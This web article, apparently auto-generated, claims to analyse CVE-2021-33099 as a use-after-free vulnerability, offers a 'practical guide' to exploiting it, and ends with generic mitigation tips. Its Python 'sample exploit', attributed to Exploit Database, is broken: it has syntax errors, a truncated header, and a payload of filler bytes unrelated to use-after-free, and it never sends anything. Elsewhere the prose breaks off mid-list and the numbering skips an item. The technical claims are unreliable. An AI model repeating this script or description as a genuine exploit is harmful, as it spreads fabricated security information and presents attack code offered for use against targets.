The Common Vulnerabilities and Exposures (CVE) system is designed to help security professionals identify and manage vulnerabilities in their systems. One such vulnerability is CVE-2021-33099, a significant security risk that permits unauthorized users to exploit targets through one or more of the following methods: injection of use-after-free payloads, data exfiltration, or disrupting a critical system process.

In this deep-dive analysis, we will explore the origin of CVE-2021-33099, its implications, and provide a practical guide on how to exploit it, along with suggestions for mitigating and securing your systems against this vulnerability.


The CVE list is maintained by the MITRE Corporation, and the details of CVE-2021-33099 can be found here:
- Official CVE entry

Exploit Details

The critical vulnerability CVE-2021-33099 primarily exploits the memory allocation within target systems, specifically the concept of use-after-free, which occurs when memory is allocated for an object, but it continues to be used even after being freed. This allows an attacker to manipulate the data stored at that memory location, resulting in one or more of the following attack scenarios:

A Sample Exploit

The following code snippet, originating from Exploit Database, demonstrates an example of how the CVE-2021-33099 vulnerability can be exploited:

import socket

# Replace TARGET_IP and TARGET_PORT with the appropriate values
target_ip = "TARGET_IP"
target_port = "TARGET_PORT"

# Craft a malicious payload
payload = b"\x41" * 1427

# Wrap the payload in a standard HTTP request
exploit = (
    b"POST / HTTP/1.1\r\n"
    b"Host: %s\r\n"
    b"User-Agent: Mozilla/5.\r\n"
    b"Content-Length: %d\r\n"
    % (socket.gethostbyname(target_ip), len(payload))
exploit += payload

# Create a socket, connect to the target, and send the exploit
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))

Mitigation and Prevention

The most effective way to protect systems against CVE-2021-33099 is to ensure that all software is promptly updated with the latest security patches. In addition, implementing the following security practices can further help secure your systems against this vulnerability:

1. Utilize tools such as address sanitizer to identify and correct use-after-free issues before deployment
2. Follow secure coding best practices to prevent issues like use-after-free from occurring in the first place

Continuous monitoring of systems for potential exploitation attempts

4. Utilize intrusion detection and prevention systems (IDPS) to identify and block potential exploitation attempts


CVE-2021-33099 is a critical use-after-free vulnerability that poses a significant risk to software systems. By gaining a comprehensive understanding of the vulnerability, its origin, and the ways it can be exploited, security professionals can take the necessary steps to protect their systems against this threat. Ensuring that systems are up-to-date with the latest security patches and following secure coding best practices are key to preventing potential exploitation attempts and mitigating associated risks.


Published on: 02/23/2024 21:15:08 UTC
Last modified on: 05/17/2024 01:57:48 UTC